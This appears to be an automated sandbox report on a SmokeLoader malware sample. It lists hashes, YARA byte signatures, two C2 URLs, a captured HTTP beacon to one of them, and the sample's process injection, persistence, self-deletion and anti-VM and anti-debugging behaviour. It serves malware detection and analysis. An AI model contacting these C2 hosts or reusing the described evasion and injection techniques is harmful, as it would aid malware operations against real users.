Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample Name:file.exe
Analysis ID:764031
MD5:56df4686b20d79d1e9070c908dbf9058
SHA1:ceceec6ec094b4979a4b9ac4049a38449982f8b2
SHA256:f6a9c1724adebd1e1bc54cb2b2e6cc49b8a6f11910a3b6acdfc6c5531a1d742b
Tags:exe
Infos:

Detection

SmokeLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
Yara detected SmokeLoader
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Deletes itself after installation
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Hides that the sample has been downloaded from the Internet (zone.identifier)
Checks if the current machine is a virtual machine (disk enumeration)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Found evasive API chain (may stop execution after checking a module file name)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Drops PE files
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)

Classification

  • System is w10x64
  • file.exe (PID: 1440 cmdline: C:\Users\user\Desktop\file.exe MD5: 56DF4686B20D79D1E9070C908DBF9058)
    • file.exe (PID: 864 cmdline: C:\Users\user\Desktop\file.exe MD5: 56DF4686B20D79D1E9070C908DBF9058)
      • explorer.exe (PID: 3324 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • ehddsbh (PID: 6128 cmdline: C:\Users\user\AppData\Roaming\ehddsbh MD5: 56DF4686B20D79D1E9070C908DBF9058)
    • ehddsbh (PID: 5140 cmdline: C:\Users\user\AppData\Roaming\ehddsbh MD5: 56DF4686B20D79D1E9070C908DBF9058)
  • cleanup
{"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
SourceRuleDescriptionAuthorStrings
00000005.00000002.446345716.0000000000583000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x785e:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
    00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
    • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
    00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmpJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
      00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmpWindows_Trojan_Smokeloader_4e31426eunknownunknown
      • 0x2f4:$a: 5B 81 EB 34 10 00 00 6A 30 58 64 8B 00 8B 40 0C 8B 40 1C 8B 40 08 89 85 C0
      Click to see the 7 entries
      SourceRuleDescriptionAuthorStrings
      1.0.file.exe.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
        6.0.ehddsbh.400000.6.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
          1.2.file.exe.400000.0.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
            6.0.ehddsbh.400000.5.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
              6.0.ehddsbh.400000.4.unpackJoeSecurity_SmokeLoader_2Yara detected SmokeLoaderJoe Security
                Click to see the 5 entries
                No Sigma rule has matched
                No Snort rule has matched

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: http://host-host-file8.com/URL Reputation: Label: malware
                Source: file.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\ehddsbhJoe Sandbox ML: detected
                Source: 6.0.ehddsbh.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 6.0.ehddsbh.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 1.0.file.exe.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 6.0.ehddsbh.400000.2.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 1.0.file.exe.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 6.0.ehddsbh.400000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 1.0.file.exe.400000.1.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 1.0.file.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
                Source: 00000006.00000002.457358703.0000000000570000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: SmokeLoader {"C2 list": ["http://host-file-host6.com/", "http://host-host-file8.com/"]}
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Binary string: C:\cumadococive\hitofi_riyax76_temihaxaki_fawavow.pdb source: file.exe, ehddsbh.2.dr
                Source: Binary string: l<C:\cumadococive\hitofi_riyax76_temihaxaki_fawavow.pdbl2D source: file.exe, ehddsbh.2.dr

                Networking

                barindex
                Source: C:\Windows\explorer.exeDomain query: host-file-host6.com
                Source: C:\Windows\explorer.exeDomain query: host-host-file8.com
                Source: Malware configuration extractorURLs: http://host-file-host6.com/
                Source: Malware configuration extractorURLs: http://host-host-file8.com/
                Source: Joe Sandbox ViewASN Name: COMBAHTONcombahtonGmbHDE COMBAHTONcombahtonGmbHDE
                Source: Joe Sandbox ViewIP Address: 84.21.172.159 84.21.172.159
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwisehi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: host-file-host6.com
                Source: explorer.exe, 00000002.00000000.322253238.000000000091F000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.355553490.0000000000921000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.382336860.000000000091F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nwisehi.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 217Host: host-file-host6.com
                Source: unknownDNS traffic detected: queries for: host-file-host6.com

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: Yara matchFile source: 1.0.file.exe.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.6.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.0.ehddsbh.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.file.exe.400000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 1.0.file.exe.400000.4.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 6.2.ehddsbh.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.ehddsbh.5615a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0.2.file.exe.5a15a0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.396112310.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000006.00000002.457358703.0000000000570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000001.00000002.396068143.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Source: 00000005.00000002.446345716.0000000000583000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000000.00000002.311136016.00000000005C3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                Source: 00000001.00000002.396112310.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000006.00000002.457358703.0000000000570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: 00000001.00000002.396068143.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
                Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 00000005.00000002.446345716.0000000000583000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000006.00000002.457448235.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000002.00000000.382917780.0000000002951000.00000020.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000000.00000002.311136016.00000000005C3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                Source: 00000001.00000002.396112310.00000000005A1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000006.00000002.457358703.0000000000570000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: 00000001.00000002.396068143.0000000000580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004148D10_2_004148D1
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00413C950_2_00413C95
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040CD0A0_2_0040CD0A
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004141D90_2_004141D9
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004156320_2_00415632
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004137510_2_00413751
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00407BA10_2_00407BA1
                Source: C:\Users\user\Desktop\file.exeCode function: String function: 00408168 appears 45 times
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_0040180C Sleep,NtTerminateProcess,1_2_0040180C
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401818 Sleep,NtTerminateProcess,1_2_00401818
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401822 Sleep,NtTerminateProcess,1_2_00401822
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401826 Sleep,NtTerminateProcess,1_2_00401826
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00401834 Sleep,NtTerminateProcess,1_2_00401834
                Source: C:\Users\user\AppData\Roaming\ehddsbhCode function: 6_2_0040180C Sleep,NtTerminateProcess,6_2_0040180C
                Source: C:\Users\user\AppData\Roaming\ehddsbhCode function: 6_2_00401818 Sleep,NtTerminateProcess,6_2_00401818
                Source: C:\Users\user\AppData\Roaming\ehddsbhCode function: 6_2_00401822 Sleep,NtTerminateProcess,6_2_00401822
                Source: C:\Users\user\AppData\Roaming\ehddsbhCode function: 6_2_00401826 Sleep,NtTerminateProcess,6_2_00401826
                Source: C:\Users\user\AppData\Roaming\ehddsbhCode function: 6_2_00401834 Sleep,NtTerminateProcess,6_2_00401834
                Source: C:\Windows\explorer.exeSection loaded: taskschd.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: webio.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Windows\explorer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: file.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\ehddsbh C:\Users\user\AppData\Roaming\ehddsbh
                Source: C:\Users\user\AppData\Roaming\ehddsbhProcess created: C:\Users\user\AppData\Roaming\ehddsbh C:\Users\user\AppData\Roaming\ehddsbh
                Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhProcess created: C:\Users\user\AppData\Roaming\ehddsbh C:\Users\user\AppData\Roaming\ehddsbhJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ehddsbhJump to behavior
                Source: classification engineClassification label: mal100.troj.evad.winEXE@6/2@4/1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: _.K>0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: Cgx0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: tf710_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: yLmc0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: /fY.0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: NKR[0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: mf:0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: 5[$'0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: ]q0r0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: EuY0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: +F280_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: eVS0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: pumitafoto0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: msimg32.dll0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: 0.txt0_2_004058A1
                Source: C:\Users\user\Desktop\file.exeCommand line argument: kernel32.dll0_2_004058A1
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\cumadococive\hitofi_riyax76_temihaxaki_fawavow.pdb source: file.exe, ehddsbh.2.dr
                Source: Binary string: l<C:\cumadococive\hitofi_riyax76_temihaxaki_fawavow.pdbl2D source: file.exe, ehddsbh.2.dr
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004081AD push ecx; ret 0_2_004081C0
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011D0 push ebx; iretd 1_2_00401217
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011D7 push ebx; iretd 1_2_00401217
                Source: C:\Users\user\Desktop\file.exeCode function: 1_2_004011EB push ebx; iretd 1_2_00401217
                Source: C:\Users\user\AppData\Roaming\ehddsbhCode function: 6_2_004011D0 push ebx; iretd 6_2_00401217
                Source: C:\Users\user\AppData\Roaming\ehddsbhCode function: 6_2_004011D7 push ebx; iretd 6_2_00401217
                Source: C:\Users\user\AppData\Roaming\ehddsbhCode function: 6_2_004011EB push ebx; iretd 6_2_00401217
                Source: file.exeStatic PE information: section name: .tutesay
                Source: file.exeStatic PE information: section name: .nuyus
                Source: ehddsbh.2.drStatic PE information: section name: .tutesay
                Source: ehddsbh.2.drStatic PE information: section name: .nuyus
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAD4 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040DAD4
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ehddsbhJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ehddsbhJump to dropped file

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\explorer.exeFile deleted: c:\users\user\desktop\file.exeJump to behavior
                Source: C:\Windows\explorer.exeFile opened: C:\Users\user\AppData\Roaming\ehddsbh:Zone.Identifier read attributes | deleteJump to behavior

                Malware Analysis System Evasion

                barindex
                Source: file.exe, 00000001.00000002.396153393.00000000005EB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ASWHOOK
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\Desktop\file.exeKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhKey enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSIJump to behavior
                Source: C:\Windows\explorer.exe TID: 4180Thread sleep count: 646 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1244Thread sleep count: 374 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1244Thread sleep time: -37400s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 1916Thread sleep count: 414 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 1916Thread sleep time: -41400s >= -30000sJump to behavior
                Source: C:\Windows\explorer.exe TID: 2312Thread sleep count: 575 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 5476Thread sleep count: 235 > 30Jump to behavior
                Source: C:\Windows\explorer.exe TID: 2860Thread sleep count: 281 > 30Jump to behavior
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Windows\explorer.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_0-8633
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 646Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 374Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 414Jump to behavior
                Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 575Jump to behavior
                Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
                Source: explorer.exe, 00000002.00000000.364013243.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
                Source: explorer.exe, 00000002.00000000.382336860.000000000091F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.339845912.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i
                Source: explorer.exe, 00000002.00000000.339845912.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.356991727.00000000043B0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                Source: explorer.exe, 00000002.00000000.339845912.00000000086E7000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                Source: explorer.exe, 00000002.00000000.364013243.0000000008631000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\file.exeSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhSystem information queried: CodeIntegrityInformationJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAC5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0040DAC5
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040DAD4 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,0_2_0040DAD4
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00412320 CreateFileA,__lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,0_2_00412320
                Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\AppData\Roaming\ehddsbhProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0040C824 SetUnhandledExceptionFilter,0_2_0040C824
